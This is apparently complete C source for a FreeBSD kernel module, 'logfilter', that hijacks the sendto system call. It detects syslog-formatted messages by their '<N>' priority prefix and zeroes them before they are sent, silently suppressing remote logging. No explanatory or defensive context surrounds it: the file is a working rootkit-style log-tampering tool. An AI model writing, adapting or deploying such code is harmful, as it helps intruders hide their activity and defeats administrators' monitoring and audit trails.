#include <sys/param.h>
#include <sys/proc.h>
#include <sys/module.h>
#include <sys/kernel.h>
#include <sys/systm.h>
#include <sys/syscall.h>
#include <sys/sysent.h>
#include <sys/sysproto.h>
#include <sys/sysctl.h>
#include <sys/linker.h>
#include <sys/unistd.h>

static int check_buf(char *);

static int logfilter_sendto(struct proc *p, struct sendto_args *uap)
	{

	if(uap->len > 16) /* 16 is minimun length for log messages */
		{
		if(check_buf((char *)uap->buf))
			{
 			char *ptr =uap->buf; 

			while(uap->len)
				ptr[--uap->len] =0x00;
			}
		}
	return sendto(p, uap);
	}

static int check_buf(char *buf)
	{
	if(buf[0] == '<' && buf[2] == '>')
		{
		if(buf[1] >= '0' && buf[1] <= '9')
			return(1);
		}
	else 
		{
		if(buf[3] == '>' && buf[1] >= '1' && buf[1] <= '9')
			return(1);
		}

	return(0);
	}

static struct sysent logfilter[1] = 
	{
	{ 6, (sy_call_t *) logfilter_sendto }
	};

static int init_module(module_t mod, int cmd, void *arg)
	{
        int ret = 0;

        switch (cmd) 
		{
		case MOD_LOAD:
			sysent[SYS_sendto] =logfilter[0];
			uprintf(" logfilter: function open/write hijacked\n");
			break;
		case MOD_UNLOAD:
			uprintf(" logfilter unloading... \n");
			sysent[SYS_sendto].sy_call =(sy_call_t *)sendto;
			break;
		default:
			ret = EINVAL;
		}
        return(ret);
	}

static struct moduledata logfilter_moddata =
	{
	"logfilter",
	init_module,
	NULL
	};

DECLARE_MODULE(syscall, logfilter_moddata, SI_SUB_DRIVERS, SI_ORDER_MIDDLE);
